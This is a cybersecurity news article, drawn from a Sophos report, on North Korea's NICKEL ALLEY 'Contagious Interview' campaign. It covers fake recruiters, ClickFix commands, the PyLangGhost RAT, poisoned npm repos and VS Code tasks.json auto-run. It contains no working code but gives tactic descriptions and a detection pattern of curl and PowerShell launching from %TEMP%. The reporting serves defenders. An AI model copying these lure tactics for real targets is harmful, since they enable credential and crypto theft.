The Contagious Interview: How NICKEL ALLEY Turns Your “Dream Job” into a North Korean Crypto Nightmare
Ddos 
Astra Byte Sync GitHub account | Image: Sophos
In a digital era where remote work and freelance gigs are the norm, a sophisticated threat group is proving that your next “dream job” could actually be a nightmare. NICKEL ALLEY, a threat group operating on behalf of the North Korean government, has intensified its “Contagious Interview” campaigns, specifically targeting tech professionals with a blend of high-end social engineering and clever technical exploits.
According to a recent report from Sophos Counter Threat Unit (CTU) researchers, this group isnβt just looking for dataβthey are after your corporate access and your cryptocurrency.
The groupβs strategy is built on three pillars of victimology: targeting freelance workers on platforms like Upwork and Fiverr, selecting high-value individuals on LinkedIn, and poisoning npm repositories.
To build trust, NICKEL ALLEY creates elaborate fake LinkedIn company pages and engages in professional “rapport building” before ever dropping a malicious link.
As the Sophos report notes:
“The group notoriously targets professionals in the technology sector by advertising fake job opportunities, deceiving prospective candidates through a fake job interview process, and ultimately delivering malware.”
Once a candidate is hooked, the “interview” moves to a technical assessment. Since mid-2025, the group has leaned heavily on the ‘ClickFix’ tactic. In this scenario, a victim is directed to a fake assessment website that intentionally displays an error.
To “fix” the error and continue the interview, the victim is instructed to run a command locally. Rather than fixing a bug, this command initiates an infection chain that delivers the PyLangGhost RAT (Remote Access Trojan). This malware is a powerhouse, capable of:
- File exfiltration and arbitrary command execution.
- System profiling and gathering browser credentials/cookies.
- Targeting Chrome cryptocurrency wallet data.
NICKEL ALLEYβs ingenuity shines in how they exploit the very tools developers use daily.
Attackers often convince victims to clone a GitHub repository for a “coding test”. One such account, astrasbytesyncs, masqueraded as a blockchain solutions company. By running standard commands like npm install and npm start, victims unknowingly execute code that fetches malware like Beaver Tail.
In late 2025, the group began using .vscode/tasks.json configuration files. These are legitimate features used for automation, but NICKEL ALLEY configured them to run malicious scripts the moment a folder is opened in VS Code.
NICKEL ALLEYβS persistence suggests they are looking for more than just a quick payday. Sophos researchers warn that:
“While these attacks appear to have a central goal of cryptocurrency theft, the threat group has demonstrated its intention to use initial access for further supply chain compromise or corporate espionage.”
What should organizations do?
- Monitor Command Execution: Look for suspicious combinations of curl, PowerShell, and executables launching from the %TEMP% directory.
- Watch Node.js Traffic: Monitor network traffic spawning from Node.js processes, as this often indicates malware retrieval.
- Report Social Lures: Encourage employees to flag unsolicited recruitment contact on social media that seems too good to be true
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
